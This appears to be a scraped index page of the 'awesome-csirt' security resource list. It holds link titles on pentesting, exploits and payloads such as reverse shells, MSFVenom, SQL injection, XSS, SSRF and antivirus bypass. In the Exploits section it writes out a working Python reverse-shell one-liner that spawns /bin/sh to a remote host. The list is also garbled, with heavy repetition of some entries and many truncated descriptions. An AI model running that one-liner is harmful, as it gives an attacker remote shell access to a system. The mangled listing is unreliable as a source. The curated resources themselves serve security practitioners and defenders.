Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
awesome-csirt
Awesome CSIRT is an curated list of links and resources in security and CSIRT daily activities.
https://github.com/Spacial/awesome-csirt
Last synced: about 5 hours ago
JSON representation
-
Pentesting
-
ARM
- pentesting tool for finding vulnerabilities in web applications
- proxycannon-ng - Built by the community during a hackathon at the WWHF 2018 security conference
- IVRE - sec/ivre)).
- Spawning a TTY Shell
- LeakLooker - ciech/LeakLooker)
- Order of the Overflow Proxy Service
- MarkBaggett’s gists
- Serverless Toolkit for Pentesters
- pentest_scripts
- IVRE - sec/ivre)).
- DomainInformation - mail. Tenta fazer transferência de zona, Busca por subdomínios e por ultimo, procura por portas abertas em cada ip dos subdomínios.. Desfrutem =)
- Spawning a TTY Shell
- LeakLooker - ciech/LeakLooker)
- postwoman - A free, fast, and beautiful alternative to Postman.
- postwoman - A free, fast, and beautiful alternative to Postman.
- liffy
- Linux for Pentester
- foxyproxy.json
- foxyproxy.json
- pown-recon
- Linux for Pentester
- Insecure Direct Object References - AUTHZ-004)
- Part 1
- Part 1
- Insecure Direct Object References - AUTHZ-004)
- Presentation Clickers
- Presentation Clickers
- Part 2
- Part 2
- Part 3
- Part 3
- Part 4
- Part 4
- DNS and DHCP Recon using Powershell
- DNS and DHCP Recon using Powershell
- pentesting tool for finding vulnerabilities in web applications
- SiteBroker - platform python based utility for information gathering and penetration testing automation!
- Nikto: A Practical Website Vulnerability Scanner
- NetAss2 - id/NetAss2).
- CSS Injection Primitives
- physical-docs
- NetAss2 - id/NetAss2).
- CSS Injection Primitives
- HACKING WITH ENVIRONMENT VARIABLES
- rootend
- DroneSploit
- HAck Tricks
- Huawei_Thief
- urldozer
- Pentesting Cheatsheets
- Snaffler
- HAck Tricks
- Several ways to download and execute malicious codes (LOLBAS)
- coregen.exe
- Jok3r - framework.com/)
- fiddler
- 21 - Pentesting FTP
- PwnWiki.io
- Proxyjump, the SSH option you probably never heard of
- GLORP - based HTTP intercept and replay proxy
- Sec4US's cheatsheets - training/cheatsheets) about shellcoding and bufferoverflow.
- Pentesting 101: Working With Exploits
- SMB AutoRelay
- Decoder++
- SCShell
- A Noob Guide to setup your Own OOB DNS Server - of-Band DNS Bind Server](https://github.com/JuxhinDB/OOB-Server): A Bind9 server for pentesters to use for Out-of-Band vulnerabilities.
- DNSLOG
- Pre-engagement
- pentest, should I do it?
- White Box Penetration Testing: “Cheating” in order to boost impact and value
- Weird Proxies
- Several ways to download and execute malicious codes (LOLBAS)
- coregen.exe
- Jok3r - framework.com/)
- Penetration Testing Cheat Sheet
- BBT - Bug Bounty Tools
- Impacket
- fiddler
- 21 - Pentesting FTP
- PwnWiki.io
- Proxyjump, the SSH option you probably never heard of
- GLORP - based HTTP intercept and replay proxy
- Sec4US's cheatsheets - training/cheatsheets) about shellcoding and bufferoverflow.
- Pentesting 101: Working With Exploits
- Decoder++
- SCShell
- bulwark
- A Noob Guide to setup your Own OOB DNS Server - of-Band DNS Bind Server](https://github.com/JuxhinDB/OOB-Server): A Bind9 server for pentesters to use for Out-of-Band vulnerabilities.
- DNSLOG
- Pre-engagement
- pentest, should I do it?
- Weird Proxies
- From Python to .Net
- Penetration Testing - An Introduction
- Poor Man's Pentest
- Operator's Decalogue
- LOTS
- Filesec.io - to-date with the latest file extensions being used by attackers.
- EMBArk
- EMBA
- OffensiveNim
- White Box Penetration Testing: “Cheating” in order to boost impact and value
- Python Penetration Testing Cheat Sheet
- Install the Microsoft signed Hybrid Connection Manager on victim host, link it up with your Azure app, enjoy persistent access to the on-prem network from your Azure portal.
- pwncat - injecting shell and port forwarding magic - and its fully scriptable with Python (PSE)
- From Python to .Net
- offensiveph - mode access controls.
- Penetration Testing - An Introduction
- Poor Man's Pentest
- Operator's Decalogue
- LOTS
- Filesec.io - to-date with the latest file extensions being used by attackers.
- EMBArk
- OffensiveNim
- White Box Penetration Testing: “Cheating” in order to boost impact and value
- Python Penetration Testing Cheat Sheet
- osquery Across the Enterprise
- osquery
- osquery Across the Enterprise
- Part 0
- Part 1
- Part 2
- Part 3
- Part 4
- Got Meterpreter? PivotPowPY!
- Pentest Tips and Tricks
- Script to steal passwords from ssh.
- Network Infrastructure Penetration Testing Tool
- "EAST" PENTEST FRAMEWORK
- DHCPwn
- trackerjacker
- TIDoS-Framework
- GitMiner
- badKarma
- Danger-zone
- go-tomcat-mgmt-scanner
- IoT Pentesting - PT](https://github.com/IoT-PTv/IoT-PT): A Virtual environment for Pentesting IoT Devices
- red_team_telemetry
- DarkSpiritz
- proxycannon-ng - Built by the community during a hackathon at the WWHF 2018 security conference
- osquery Across the Enterprise
- Intrusion Detection
- Part 0
- Part 1
- Part 2
- Part 3
- Part 4
- Got Meterpreter? PivotPowPY!
- Pentest Tips and Tricks
- "EAST" PENTEST FRAMEWORK
- TIDoS-Framework
- IoT Pentesting - PT](https://github.com/IoT-PTv/IoT-PT): A Virtual environment for Pentesting IoT Devices
- red_team_telemetry
- osquery Across the Enterprise
- White Box Penetration Testing: “Cheating” in order to boost impact and value
- PwnWiki.io
- Proxyjump, the SSH option you probably never heard of
- osquery Across the Enterprise
- IVRE - sec/ivre)).
- LeakLooker - ciech/LeakLooker)
- Insecure Direct Object References - AUTHZ-004)
- CSS Injection Primitives
- Several ways to download and execute malicious codes (LOLBAS)
- Sec4US's cheatsheets - training/cheatsheets) about shellcoding and bufferoverflow.
- White Box Penetration Testing: “Cheating” in order to boost impact and value
- osquery Across the Enterprise
- White Box Penetration Testing: “Cheating” in order to boost impact and value
- osquery Across the Enterprise
- osquery Across the Enterprise
- White Box Penetration Testing: “Cheating” in order to boost impact and value
- osquery Across the Enterprise
- osquery Across the Enterprise
- White Box Penetration Testing: “Cheating” in order to boost impact and value
- White Box Penetration Testing: “Cheating” in order to boost impact and value
- osquery Across the Enterprise
- MarkBaggett’s gists
- Penetration Testing Tools Cheat Sheet ∞
- White Box Penetration Testing: “Cheating” in order to boost impact and value
- osquery Across the Enterprise
- osquery Across the Enterprise
- White Box Penetration Testing: “Cheating” in order to boost impact and value
- osquery Across the Enterprise
- White Box Penetration Testing: “Cheating” in order to boost impact and value
- osquery Across the Enterprise
- osquery Across the Enterprise
- White Box Penetration Testing: “Cheating” in order to boost impact and value
- osquery Across the Enterprise
- White Box Penetration Testing: “Cheating” in order to boost impact and value
- osquery Across the Enterprise
- White Box Penetration Testing: “Cheating” in order to boost impact and value
- osquery Across the Enterprise
- White Box Penetration Testing: “Cheating” in order to boost impact and value
- osquery Across the Enterprise
- White Box Penetration Testing: “Cheating” in order to boost impact and value
- osquery Across the Enterprise
- osquery Across the Enterprise
- osquery Across the Enterprise
- White Box Penetration Testing: “Cheating” in order to boost impact and value
- osquery Across the Enterprise
- White Box Penetration Testing: “Cheating” in order to boost impact and value
- osquery Across the Enterprise
- White Box Penetration Testing: “Cheating” in order to boost impact and value
- osquery Across the Enterprise
- White Box Penetration Testing: “Cheating” in order to boost impact and value
- osquery Across the Enterprise
- White Box Penetration Testing: “Cheating” in order to boost impact and value
- osquery Across the Enterprise
- HAck Tricks
- 21 - Pentesting FTP
- osquery Across the Enterprise
- osquery Across the Enterprise
- osquery Across the Enterprise
- IoTSecurity101
- PentestHardware
- PENTESTING-BIBLE
- Micro8 - test, network security enthusiasts, etc., enterprise security protection and improvement, the series complies with: Free, free, shared, open source.
- Penetration Test Guide based on the OWASP + Extra - TEST. I hope it will be useful in both penetration test projects and bug-bounty.
- Weird Proxies
- osquery Across the Enterprise
- osquery Across the Enterprise
- osquery Across the Enterprise
-
Exploits
- The Invoke-CradleCrafter Overview
- AllPocsFromHackerOne
- How I Found My First Ever ZeroDay (In RDP)
- How I Found My First Ever ZeroDay (In RDP)
- SharpSelfDelete
- DVS - Lateral movement using DCOM Objects.
- Security Focus
- Exploit Files
- Exploits, Vulnerabilities and Payloads: Practical Introduction
- Exploits, Vulnerabilities and Payloads: Practical Introduction
- Beginners Guide to 0day/CVE AppSec Research
- Vulnerability DB
- mssqlproxy
- Beginners Guide to 0day/CVE AppSec Research
- Traditional Buffer Overflow Windows cheatsheet
- Traditional Buffer Overflow Windows cheatsheet
- Exploit writing tutorial part 3 : SEH Based Exploits
- Exploit writing tutorial part 3 : SEH Based Exploits
- Script to decode .vbe files
- Script to decode .vbe files
- Exploit Files
- Graphology of an Exploit
- Graphology of an Exploit
- The Exploit Database Git Repository
- Vulnerability Lab
- Vulnerability DB
- 0day.Today - The Underground, is one of the world's most popular and comprehensive computer security web sites.
- cxsecurity
- IOSurface exploit
- Attacking a co-hosted VM: A hacker, a hammer and two memory modules
- How To Create a Metasploit Module
- Installing Metasploit Pro, Ultimate, Express, and Community
- unfurl - Based Link Vulnerability Analysis Tool](https://jlospinoso.github.io/python/unfurl/abrade/hacking/2018/02/08/unfurl-url-analysis.html)
- Sage ACF Blocks
- WebKit exploit
- A First Introduction to System Exploitation
- A First Introduction to System Exploitation
- IOSurface exploit
- Installing Metasploit Pro, Ultimate, Express, and Community
- WebKit exploit
- Python 2 vs 3 for Binary Exploitation Scripts
- DriveCrypt
- Faxploit
- NAVEX
- Three New DDE Obfuscation Methods
- fuxploider
- Jailbreaks Demystified
- Attacking Google Authenticator
- Introduction to ptmalloc2 internals (Part 1)
- ptmalloc2 internals (Part 2) - Fast Bins and First Fit Redirection
- UEFI vulnerabilities classification focused on BIOS implant delivery - update-tools-c246f7299459)
- MikroTik Firewall & NAT Bypass
- 3D Accelerated Exploitation - 3D Accelerated Exploitation. The talk dealt with research into the VirtualBox 3D Acceleration feature, which is backed by a software component called Chromium.
- Beat the hole in the ATM
- RedGhost
- Z-Shave. Exploiting Z-Wave downgrade attacks
- Totally Pwning the Tapplock Smart Lock - Andrew Tierney 13 Jun 2018
- The Art of WebKit Exploitation
- PEASS
- Patchless AMSI bypass using SharpBlock
- Lets Create An EDR… And Bypass It! Part 1
- Lets Create An EDR… And Bypass It! Part 2
- SharpBlock
- Bypassing Antivirus with Golang – Gopher it!
- Modern Binary Exploitation - Spring 2015
- Python 2 vs 3 for Binary Exploitation Scripts
- Faxploit
- beebug
- NAVEX
- Three New DDE Obfuscation Methods
- Jailbreaks Demystified
- Attacking Google Authenticator
- Introduction to ptmalloc2 internals (Part 1)
- ptmalloc2 internals (Part 2) - Fast Bins and First Fit Redirection
- UEFI vulnerabilities classification focused on BIOS implant delivery - update-tools-c246f7299459)
- MikroTik Firewall & NAT Bypass
- GhostDelivery
- Beat the hole in the ATM
- Z-Shave. Exploiting Z-Wave downgrade attacks
- Totally Pwning the Tapplock Smart Lock - Andrew Tierney 13 Jun 2018
- The Art of WebKit Exploitation
- PEASS
- Patchless AMSI bypass using SharpBlock
- Lets Create An EDR… And Bypass It! Part 1
- Lets Create An EDR… And Bypass It! Part 2
- SharpBlock
- Bypassing Antivirus with Golang – Gopher it!
- The Invoke-CradleCrafter Overview
- Sticky notes for pentesting. - notes)
- I found myself in need of a much shorter python reverse oneliner than shellpop provides by default. Here's what I landed on. 🙃 - c "import pty,socket;h,p='192.168.200.1',12345;socket.create_connection((h,p));pty.spawn('/bin/sh');"
- Lets Create An EDR… And Bypass It! Part 2
- A collection of vulnerable ARM binaries for practicing exploit development
-
Payloads
- LaTex Injection
- CSV-Injection
- CSV Injection
- Directory Traversal
- Which Security Risks Do CORS Imply?
- Cross-Origin Resource Sharing (CORS)
- How to win at CORS
- SSRF Search & Destroy
- SSRF
- SSRF Tips
- Server Side Request Forgery on MISP - 2020-28043.
- Exploiting JNDI Injections in Java
- MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter)
- MSFVenom - CheatSheet
- Creating Metasploit Payloads
- Shikata Ga Nai Encoder Still Going Strong
- BYPASSING ANTIVIRUS WITH MSFVENOM
- MSFVenom Cheatsheet
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- Handling Short Expiration Time of Authorization Tokens
- Reverse Shell Cheat Sheet
- Awesome one-liner bug bounty
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Payloads Collection
- Command Injection Payload List
- Cross Site Scripting ( XSS ) Vulnerability Payload List
- XML External Entity (XXE) Injection Payload List
- RFI/LFI Payload List
- Open Redirect Payload List
- Criando Payloads de Shell Reverso com MSFVenom
- MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter)
- MSFVenom - CheatSheet
- Hiding Metasploit Shellcode to Evade Windows Defender
- Creating Metasploit Payloads
- BYPASSING ANTIVIRUS WITH MSFVENOM
- MSFVenom Cheatsheet
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- LaTex Injection
- Hiding malicious code with “Module Stomping”: Part 1
- PyFuscation
- Starting a handler with Metasploit
- Reverse Shell Cheat Sheet
- System Calls
- Awesome one-liner bug bounty
- bbrecon
- RPC Bug Hunting Case Studies – Part 1
- Top Penetration Testing & Bug Hunting YouTube Channels you should follow - Updated 11/19/2020
- Our top tips for better bug bounty reports, plus a hacker contest!
- KindleDrip
- Amazon Kindle Vulnerabilities Could Have Led Threat Actors to Device Control and Information Theft
- How I Might Have Hacked Any Microsoft Account
- BugBountyScanner
- alert() is dead, long live print()
- Bug Bounty Reconnaissance Framework
- If you do use BBRF, here it is a initial script to use HackerOne API to gather all programs' scope, including your private programs.
- NotKeyHacks - F and save a lot of time.
- Two Rights Might Make A Wrong
- You always hear stories about how bug bounty programs steal your bug, but very few people post about it, or have the 100% proof to show this.
- OOB reads in network message handlers leads to RCE
- Bug Bounty Resources
- Google Bug Hunters
- 0-Day Hunting (Chaining Bugs/Methodology)
- KingOfBugBounty Project - known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters..
- Introducing CookieMonster
- get-title
- CRLF
- Top Penetration Testing & Bug Hunting YouTube Channels you should follow - Updated 11/19/2020
- Our top tips for better bug bounty reports, plus a hacker contest!
- KindleDrip
- Amazon Kindle Vulnerabilities Could Have Led Threat Actors to Device Control and Information Theft
- How I Might Have Hacked Any Microsoft Account
- alert() is dead, long live print()
- If you do use BBRF, here it is a initial script to use HackerOne API to gather all programs' scope, including your private programs.
- Two Rights Might Make A Wrong
- OOB reads in network message handlers leads to RCE
- Bug Bounty Resources
- Google Bug Hunters
- get-title
- Insecure Direct Object References
- Crypto
- ParamSpider
- Server Side Request Forgery
- CRLF
- CRLF Injection
- crlf-injector
- CRLF Bruter
- CSV-Injection
- CSV Injection
- Command Injection
- Directory Traversal
- $4,000 Starbucks secondary context path traversal
- LFI
- fimap
- File Inclusion
- Open-Redirect
- RCE
- Template Injection
- SSTI
- XSLT
- Content Injection
- LDAP Injection
- NoSQL Injection
- ISCM
- OAuth
- XPATH Injection
- Bypass Upload Tricky
- Web Security CheatSheet
- Presenting The Pwning-Machine, a versatile and easy to setup Bug bounty environment.
- Zeus-Scanner - in URL parsing engine, multiple search engine compatibility, the ability to extract URLs from both ban and webcache URLs, the ability to run multiple vulnerability assessments on the target, and is able to bypass search engine captchas.
- SQL injection
- SQL Injection
- Blind SQL injection
- Dangerous Injections
- Blind SQL Injection at fasteditor.hema.com
- SQL Injection 101: How to Fingerprint Databases & Perform General Reconnaissance for a More Successful Attack
- SQL injection cheat sheet
- SQL Injection Cheat Sheet
- The Ultimate SQL Injection Cheat Sheet
- $4,000 Starbucks secondary context path traversal
- LFI
- fimap
- File Inclusion
- Open-Redirect
- RCE
- Template Injection
- SSTI
- XSLT
- Content Injection
- LDAP Injection
- NoSQL Injection
- ISCM
- XPATH Injection
- Bypass Upload Tricky
- Web Security CheatSheet
- Presenting The Pwning-Machine, a versatile and easy to setup Bug bounty environment.
- SQL injection
- SQL Injection
- Blind SQL injection
- Dangerous Injections
- Blind SQL Injection at fasteditor.hema.com
- SQL Injection 101: How to Fingerprint Databases & Perform General Reconnaissance for a More Successful Attack
- SQL injection cheat sheet
- SQL Injection Cheat Sheet
- The Ultimate SQL Injection Cheat Sheet
- Examining the database in SQL injection attacks
- SQLi
- SleuthQL
- Postgres SQL Injection Cheat Sheet
- From SQL Injection to Shell: PostgreSQL edition
- Pentesting PostgreSQL with SQL Injections
- SQLite Injection
- Blind SQL Injection Detection and Exploitation (Cheat Sheet)
- 1 - sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet), [4](https://thedarksource.com/sqlmap-cheat-sheet/), [tamper scripts](https://gist.github.com/sapran/a12bd98cf212237ac9678d48f5152941)
- SQL injection
- DNS Hijacking Attacks on Home Routers in Brazil
- CSRF Injection
- Bypassing CSRF tokens with Python’s CGIHTTPServer to exploit SQL injections
- Practical Attacks Using HTTP Request Smuggling
- HAProxy HTTP request smuggling - 2019-18277)
- The Powerful HTTP Request Smuggling
- Smuggler
- HTTP.Request.Smuggling.Desync.Attack
- h2c Smuggling
- Advanced request smuggling
- Reflected XSS on www.hackerone.com via Wistia embed code
- Portable Data exFiltration: XSS for PDFs - data-exfiltration)
- How to solve a challenge from Intigriti in under 60 minutes
- XSS Hunter - site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service. [xss hunter shortcut](http://xss.ht/)
- DalFox(Finder Of XSS) / Parameter Analysis and XSS Scanning tool based on golang
- Security impact of a misconfigured CORS implementation
- Examining the database in SQL injection attacks
- Dumping a complete database using SQL injection
- SQLi
- SleuthQL
- Postgres SQL Injection Cheat Sheet
- From SQL Injection to Shell: PostgreSQL edition
- Pentesting PostgreSQL with SQL Injections
- SQLite Injection
- Blind SQL Injection Detection and Exploitation (Cheat Sheet)
- 1 - sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet), [4](https://thedarksource.com/sqlmap-cheat-sheet/), [tamper scripts](https://gist.github.com/sapran/a12bd98cf212237ac9678d48f5152941)
- SQL injection
- CSRF Injection
- Bypassing CSRF tokens with Python’s CGIHTTPServer to exploit SQL injections
- Practical Attacks Using HTTP Request Smuggling
- HAProxy HTTP request smuggling - 2019-18277)
- The Powerful HTTP Request Smuggling
- Smuggler
- HTTP.Request.Smuggling.Desync.Attack
- h2c Smuggling
- Advanced request smuggling
- Cross-site scripting (XSS) cheat sheet
- Reflected XSS on www.hackerone.com via Wistia embed code
- xss cheatsheet
- an XSS payload, Cuneiform-alphabet based
- Portable Data exFiltration: XSS for PDFs - data-exfiltration)
- Find reflected parameters with Burp_Suite
- How to solve a challenge from Intigriti in under 60 minutes
- XSS Hunter - site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service. [xss hunter shortcut](http://xss.ht/)
- How to win at CORS
- CORS'ing a Denial of Service via cache poisoning
- SSRF Search & Destroy
- SSRF
- Server Side Request Forgery on MISP - 2020-28043.
- SSRF (Server Side Request Forgery) worth $4,913 | My Highest Bounty Ever !
- Unauthenticated Full-Read SSRF in Grafana - 2020-13379
- Server-Side Request Forgery using Javascript allows to exfill data from Google Metadata
- Blind SSRF Chains
- Out of Band XXE in an E-commerce IOS app
- Comprehensive Guide on XXE Injection
- XMLDecoder payload generator
- XXE
- SerialVersionUID in Java
- CORS'ing a Denial of Service via cache poisoning
- SSRF (Server Side Request Forgery) worth $4,913 | My Highest Bounty Ever !
- Unauthenticated Full-Read SSRF in Grafana - 2020-13379
- Server-Side Request Forgery using Javascript allows to exfill data from Google Metadata
- Gf-Patterns
- Blind SSRF Chains
- lorsrf
- Out of Band XXE in an E-commerce IOS app
- Comprehensive Guide on XXE Injection
- XMLDecoder payload generator
- XXE
- dtd-finder
- New XML technique! Encode any DTD/XML inside an internal entity, and fly under WAF radars!
- XXE_payloads
- Advanced XXE Exploitation
- ysoserial - of-concept tool for generating payloads that exploit unsafe Java object deserialization.
- SerialVersionUID in Java
- Java Serialization Magic Methods And Their Uses With Example
- Apache Tomcat Deserialization of Untrusted Data RCE (CVE-2020–9484) - tomcat/java/org/apache/naming/factory/BeanFactory.java): java/org/apache/naming/factory/BeanFactory.java - good to use for JRMI abuse
- CVE-2020-9484-Mass-Scan
- Exploiting JNDI Injections in Java
- How to exploit Liferay CVE-2020-7961 : quick journey to PoC
- How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM
- Serialization: the big threat
- Fear of the Unknown: A Metanalysis of Insecure Object Deserialization Vulnerabilities
- Deserialization
- FAR SIDES OF JAVA REMOTE PROTOCOLS
- Serialization and deserialization in Java: explaining the Java deserialize vulnerability
- Orange: How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!
- code white | Blog: Liferay Portal JSON Web Service RCE Vulnerabilities
- How to Insomnia for GraphQL requests
- InQL Scanner
- Debugging your GraphQL server was never this easy!
- GraphQL Voyager
- pbtk - Reverse engineering Protobuf apps - based apps.
- Online Protobuf Decoder.
- LazySSTICheck
- CSM_Pocs - class security management application that provides insight into and control of Cisco security and network devices.
- DSSS
- Garud - domains, sub-domain takeover and then filters out xss, ssti, ssrf and more injection point parameters.
- waybackurls
- Easily Identify Malicious Servers on the Internet with JARM
- Turbo Search
- Coordinated disclosure of XML round-trip vulnerabilities in Go’s standard library
- JWT Vulnerabilities (Json Web Tokens)
- Java Serialization Magic Methods And Their Uses With Example
- Apache Tomcat Deserialization of Untrusted Data RCE (CVE-2020–9484) - tomcat/java/org/apache/naming/factory/BeanFactory.java): java/org/apache/naming/factory/BeanFactory.java - good to use for JRMI abuse
- How to exploit Liferay CVE-2020-7961 : quick journey to PoC
- How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM
- Serialization: the big threat
- marshalsec
- SerializationDumper
- owaspsd-deserialize-my-shorts
- Fear of the Unknown: A Metanalysis of Insecure Object Deserialization Vulnerabilities
- Deserialization
- FAR SIDES OF JAVA REMOTE PROTOCOLS
- Serialization and deserialization in Java: explaining the Java deserialize vulnerability
- Testing and exploiting Java Deserialization in 2021
- Orange: How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!
- code white | Blog: Liferay Portal JSON Web Service RCE Vulnerabilities
- GraphQL - voyager/) [graphql](https://github.com/APIs-guru/graphql-voyager):  Represent any GraphQL API as an interactive graph.
- GraphQL security 101
- How to Insomnia for GraphQL requests
- InQL Scanner
- GraphQL Voyager
- Queries and Mutations
- GraphQL Injection
- ProtoFuzz
- CSM_Pocs - class security management application that provides insight into and control of Cisco security and network devices.
- Easily Identify Malicious Servers on the Internet with JARM
- JWT Vulnerabilities (Json Web Tokens)
- Hacking Starbucks and Accessing Nearly 100 Million Customer Records
- Attacking Secondary Contexts in Web Applications
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- Fugu API Tracker - company effort to make it possible for web apps to do anything iOS, Android, or desktop apps can, by exposing the capabilities of these platforms to the web while maintaining user security, privacy, trust, and other core tenets of the web.
- XS-Leaks - site leaks (aka XS-Leaks, XSLeaks) are a class of vulnerabilities derived from side-channels 1 built into the web platform. They take advantage of the web’s core principle of composability, which allows websites to interact with each other, and abuse legitimate mechanisms 2 to infer information about the user. One way of looking at XS-Leaks is to highlight their similarity with cross-site request forgery (CSRF 3) techniques, with the main difference being that instead of allowing other websites to perform actions on behalf of a user, XS-Leaks can be used to infer information about a user.
- Chrome extension to detect possible xsleaks
- Web Finder
- Flask Unsign - force and craft session cookies of a Flask application by guessing secret keys.
- jwt-pwn
- Burp Suite Cheat Sheet
- Part 1 – Introduction & Configuration
- Part 3 – Reporting
- Deploying a private Burp Collaborator server
- Burp Collaborator Server docker container with LetsEncrypt certificate
- Hacking Starbucks and Accessing Nearly 100 Million Customer Records
- Attacking Secondary Contexts in Web Applications
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- Fugu API Tracker - company effort to make it possible for web apps to do anything iOS, Android, or desktop apps can, by exposing the capabilities of these platforms to the web while maintaining user security, privacy, trust, and other core tenets of the web.
- XS-Leaks - site leaks (aka XS-Leaks, XSLeaks) are a class of vulnerabilities derived from side-channels 1 built into the web platform. They take advantage of the web’s core principle of composability, which allows websites to interact with each other, and abuse legitimate mechanisms 2 to infer information about the user. One way of looking at XS-Leaks is to highlight their similarity with cross-site request forgery (CSRF 3) techniques, with the main difference being that instead of allowing other websites to perform actions on behalf of a user, XS-Leaks can be used to infer information about a user.
- Chrome extension to detect possible xsleaks
- Web Finder
- jwt-pwn
- Part 1 – Introduction & Configuration
- Part 2 – Testing
- Part 3 – Reporting
- privatecollaborator - certificate
- Deploying a private Burp Collaborator server
- SELF-HOSTED BURP COLLABORATOR FOR FUN AND PROFIT - vulnerabilities and exfiltrate data.
- AES-Killer v3.0
- Howto install and use the Burp Suite as HTTPS Proxy on Ubuntu 14.04
- BurpExtension-WhatsApp-Decryption-CheckPoint
- param-miner
- PII-Identifier
- API testing with Swurg for Burp Suite
- create a Passive Profile for a param value, like *testsqli* and then create a Rule with this Profile to trigger SQLi active profile.
- Handling Short Expiration Time of Authorization Tokens
- BurpSuite-Team-Extension - versa!
- ActiveScan++
- SELF-HOSTED BURP COLLABORATOR FOR FUN AND PROFIT - vulnerabilities and exfiltrate data.
- AES-Killer v3.0
- Howto install and use the Burp Suite as HTTPS Proxy on Ubuntu 14.04
- param-miner
- API testing with Swurg for Burp Suite
- Handling Short Expiration Time of Authorization Tokens
- IDOR
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- Handling Short Expiration Time of Authorization Tokens
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- get-title
- CSV Injection
- Content Injection
- XPATH Injection
- SQL injection
- Blind SQL injection
- Dangerous Injections
- The Ultimate SQL Injection Cheat Sheet
- Blind SQL Injection Detection and Exploitation (Cheat Sheet)
- Portable Data exFiltration: XSS for PDFs - data-exfiltration)
- XSS Hunter - site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service. [xss hunter shortcut](http://xss.ht/)
- CORS'ing a Denial of Service via cache poisoning
- Server-Side Request Forgery using Javascript allows to exfill data from Google Metadata
- Blind SSRF Chains
- Java Serialization Magic Methods And Their Uses With Example
- CSM_Pocs - class security management application that provides insight into and control of Cisco security and network devices.
- JWT Vulnerabilities (Json Web Tokens)
- Attacking Secondary Contexts in Web Applications
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- SELF-HOSTED BURP COLLABORATOR FOR FUN AND PROFIT - vulnerabilities and exfiltrate data.
- AES-Killer v3.0
- Handling Short Expiration Time of Authorization Tokens
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- Handling Short Expiration Time of Authorization Tokens
- Shikata Ga Nai Encoder Still Going Strong
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- Handling Short Expiration Time of Authorization Tokens
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- Handling Short Expiration Time of Authorization Tokens
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Hiding malicious code with “Module Stomping”: Part 1
- Awesome one-liner bug bounty
- RPC Bug Hunting Case Studies – Part 1
- Dangerous Injections
- HRS - 𝐇𝐓𝐓𝐏 𝐑𝐞𝐪𝐮𝐞𝐬𝐭 𝐒𝐦𝐮𝐠𝐠𝐥𝐢𝐧𝐠 Attack. What, Why and How.
- Enjoying my first blind xxe experience
- GraphQL - voyager/) [graphql](https://github.com/APIs-guru/graphql-voyager):  Represent any GraphQL API as an interactive graph.
- Coordinated disclosure of XML round-trip vulnerabilities in Go’s standard library
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- XS-Leaks - site leaks (aka XS-Leaks, XSLeaks) are a class of vulnerabilities derived from side-channels 1 built into the web platform. They take advantage of the web’s core principle of composability, which allows websites to interact with each other, and abuse legitimate mechanisms 2 to infer information about the user. One way of looking at XS-Leaks is to highlight their similarity with cross-site request forgery (CSRF 3) techniques, with the main difference being that instead of allowing other websites to perform actions on behalf of a user, XS-Leaks can be used to infer information about a user.
- Handling Short Expiration Time of Authorization Tokens
- Planilhas Baby
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
